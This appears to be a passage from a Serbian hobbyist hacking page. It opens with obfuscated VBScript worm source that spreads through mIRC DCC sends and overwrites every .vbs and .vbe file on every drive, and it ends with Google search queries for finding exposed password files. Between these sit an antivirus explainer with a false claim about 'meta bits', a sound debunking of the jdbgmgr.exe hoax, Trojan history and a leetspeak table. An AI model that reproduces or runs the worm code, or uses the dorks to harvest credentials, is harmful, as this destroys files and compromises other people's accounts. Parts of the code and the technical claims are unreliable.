N46SM3R1 = RH5KFA0D & “mirc”
Else
N46SM3R1 = “”
End If
End If
If N46SM3R1 <> “” Then
Set C1JLJ66F = HFFLUN1U.CreateTextFile(N46SM3R1 & “script.ini”, True)
C1JLJ66F = “[script]” & vbCrLf & “n0=on 1:JOIN:#:{”
C1JLJ66F = C1JLJ66F & vbCrLf & “n0=on 1:JOIN:#:{”
C1JLJ66F = C1JLJ66F & vbCrLf & “n1= /if ( $nick == $me ) { halt }”
C1JLJ66F = C1JLJ66F & vbCrLf & “n2= /.” & Chr(100) & Chr(99) & Chr(99) & ” send $nick “
C1JLJ66F = C1JLJ66F & R125B3VC
C1JLJ66F = C1JLJ66F & vbCrLf & “n3=}”
script.Close
End If
End Function
Function VB17JIJS()
On Error Resume Next
Set HVNE84R3 = HFFLUN1U.Drives
For Each SPBC4Q28 In HVNE84R3
KA61L0PN = SPBC4Q28 & ” “
Call I1HE2CE2(KA61L0PN)
Next
End Function

Function I1HE2CE2(P8HO634G)
FD6T6S1N = P8HO634G
Set F54HU6J5 = HFFLUN1U.GetFolder(FD6T6S1N)
Set KS2NN47N = F54HU6J5.Files
For Each S9C7C2GI In KS2NN47N
If lcase(S9C7C2GI.Name) = “mirc.ini” Then
EJSL7CBE(S9C7C2GI.ParentFolder)
End If
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = “vbs”
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = “vbe”
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
Next
Set P67O4ULQ = F54HU6J5.Subfolders
For Each PR35UKR1 In P67O4ULQ
Call (PR35UKR1.path)
Next
End function
Function O8UN6TKP()
SO2ERHGU.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRegisteredOwner”,”IMAS_VIRUS”
end function

######### SECI OVDE #########

(evo malo casova o AntiVirus tehnologiji i zastiti)

Od pojave novog virusa pa sve dok ga neka AntiVirus Laboratorija ne detektuje prodje uvek ali uvek
6 meseci pa cak i do 2 godine dok se ne napravi zastita….
Detekcija naravno zavisi od stepena rasirenosti i prijava na dejstvo virusa u kompjuteru
Sto znaci ako se virusom napadne neka velika kompanija onda ce detekcija biti brza
zapravo postoje cak predpostavke da na svetu postoji jos plus 100.000 virusa koji su ne detektovani
jer kruze u malom broju racunara u siromasnim i ne tako dostupnim krajevima sveta, koji imaju lose
modemske veze i nisu tako cesto prikljuceni u mrezu…Detekcija je otezana ili skoro ne moguca
Kada AntiVirusna laboratorija detektuje odredjeni virus, ona okuplja svoj tim strucnjaka - programera
da napisu zastitu kojom ce se ovaj virus onesposobiti..
Naime, oni izvrnu code virusa i dobro ga prouce…..Zatim pisu zastitu koja ce ga detektovati (prepoznati)
i obrisati…Detekcija se vrsi na vise nacina:

1.) Prepoznavanjem velicine u meta bitovima
( Meta bitovi su ako niste znali jos manje jedinice od bita koje opisuju bitove) .

2.) Prepoznavanjem imena i exstenzije

3.) Prepoznavanjem strukture koda ( sto znaci da prepozna sta taj virus radi, npr. izbrise neki vazan fajl ,
otvori port, kopira se, spijunira, salje se preko mail i td…

4.) Zastita od pojave novih ne detektovanih virusa ( zastita uporedjivanjem slicnosti )
uporedjivanjem sa bazom informacija , imena i kodova od vec postojecih potpisa —( hahahah—aaa malo sutra )
————————————————————————————————————————————————————–
Sto znaci ; da ako autor virusa promeni ime ili exstenziju ili velicinu i bitnije izmeni kod ——eto novog ISTOG virusa
i eto jos narednih 6 meseci slobodnog bitisanja u cyber prostoru…cool zar ne

[Zavrsna rec]

Primere virusa koji se nalaze u ovom tekstu vam nisam napisao kako bi ih vi iskopirali i poceli da unistavate tudje kompjutere, vec samo da bi ukapirali kako se oni prave i da vam ukazem na to kako oni izgledaju.

——————————————————————————–

Hoax - lazna uzbuna

——————————————————————————–

[Virus ili Hoax?]

—–
Nasao sam ovaj virus na mom C drajvu.
Molim procitajte!!! Veoma je vazno!!!
Nas address book je zarazen virusom i, kao posledica i vas je jer je vasa adresa u nasem adresaru. Virus se zove jdbgmgr.exe. Ne mogu da ga otkriju Norton ili McAfee anti virus programi. Miruje 14 dana pre ostecenja sistema. Automatski ga salju messanger i address book, bez obzira da li saljete e-mail. Da bi ste ga se oslobodili:
1. Idite na Start, potom Find ili Search;
2. U Files/Folders upisite ime jdbgmgr.exe;
3. Ne zaboravite da pretrazite C drajv;
4. Kliknite na Find ili Search;
5. Virus ima ikonicu medvedica sa imenom jdbgmgr.exe - NE OTVARAJTE;
6. Kliknite desnim tasterom i obrisite ga odatle.
AKO NADJETE VIRUS KONTAKTIRAJTE SVE IZ VASEG ADRESARA
—–

Ovo je jedan od najpoznatijih primera hoax-a u poslednje vreme. Mnogo poruka sa prakticno identicnim sadrzajem je razmenjeno, mnogo tekstova, upozorenja, objasnjenja napisano, ali ocigledno da jos ima korisnika racunara koji za ovo nisu culi. Moram ukratko da objasnim dve stvari: sta je hoax i o cemu se u konkretnom slucaju radi. Hoax je lazno obavestenje o otkricu virusa. Po pravilu je intonirano veoma dramaticno, uz upozorenje o katastrofalnim posledicama njegovog delovanja, nemogucnosti detekcije bilo cime i praceno uputstvom za uklanjanje “opasnosti” sa racunara. Naravno, tu je i molba da se poruka prosledi svima ciju adresu imate. Naivni korisnici racunara ovako i postupe, sto ima dve negativne posledice: brisanje nekog vaznog fajla sa racunara i zatrpavanje ljudi nezeljenom postom (mada iz dobre namere). Ovako se moze ostetiti funkcionalnost operativnog sistema i navuci na sebe (opravdani) bes primalaca nezeljene poste. Jdbgmgr.exe je fajl koji se nalazi na skoro svim racunarima koji rade pod Windows-ima. Detaljnije informacije mozete naci na: http://support.microsoft.com/default.aspx?scid=kb;en-us;Q322993 Zvanicni naziv fajla je Microsoft Debugger Registrar for Java. Nema potrebe za preduzimanjem bilo kakvih preventivnih mera. Koriste ga samo oni koji se bave Microsoft Visual J 1.1. Drugim recima, ako ne spadate u ovu grupu korisnika nece biti nikakve stete i ako obrisete pomenuti fajl, osim ako ne pravite Java programe. Stoga necu opisivati postupke za njegovo vracanje.

Zakljucak iz ovog slucaja moze da bude da ne verujete svemu sto procitate. Ako dobijete poruku slicnu ovoj, pre nego sto preduzmete bilo kakvu akciju ciscenja racunara, proverite sajtove proizvodjaca AV software-a, trazeci u opisima virusa ime onog o kome vas obavestavaju. Mozete ici i na www.google.com i kao rec za pretragu uneti “ime fajla”. Sigurno cete negde naci pouzdano obavestenje iz relativnog izvora. Naravno, nemojte prosledjivati poruku ni na jednu e-mail adresu, a kamoli na sve adrese koje posedujete.

——————————————————————————–

Trojanac (trojanski konj)

——————————————————————————–

[Malo casova istorije]

Trojanci su svoje ime dobili prema cuvenom epu o opsadi Troje, koju su Grci bezuspesno napadali 10 godina i na kraju se povukli ostavljajuci pred njenim ulazom ogromnog konja kao znak priznavanja poraza. Trojanski ratnici su odusevljeno konja uvukli unutar grada i posvetili su se proslavljanju svoje velike pobede. Medjutim, kada su svi zaspali pijani, na konju su se otvorila dobro skrivana vratanca i iz njega je izasao odred grckih ratnika koji je otvorio vrata tvrdjave pustajuci unutra ostale Grke, koji su povlacenje iscenirali i cekali na taj trenutak. Nakon toga Troju su veoma lako zauzeli.

Ovo je Hexxxor jezik , u prevodu lakseg
objasnjenja hexxxor jezik je programski jezik
kojim cete lakse sifrovati komande i tajne…

” Ujedno hexxxor vam mnogo moze posluziti u
Google.hack tragacu … Pa sam
odlucio da prikazem azbuku kodirajuceg jezika…

A - 4, @, /, /-
B- 8
C - (
D - |)
E - 3
F - F
G - 9
H - #, |-|
I - 1, I, !, |
J - J
K - |<, |{
L - |_
M - |/|, //
N - //, ||
O - O
P - P
R - |2
Q - Q
S - 5
T - 7, +
U - |_|
V - V, /
W- //, W
X - ><
Y - `/
Z - Z

trazili ste kako se hackuje password?
Uglavnom je najlakše pronaci popis username i lozinki…
Da bi se našlo nešto takvo, treba upisati u google nešto od sledeceg:inurl:pass.txt
inurl:passwd.txt
inurl:password.txt
inurl:passwds.txt
inurl:passwords.txt
inurl:pass.txt
inurl:pass.txt

Zatim ce vam se otvoriti prozorce sa mnogo zanimljivim radom…
vama sad ostaje da se poigrate.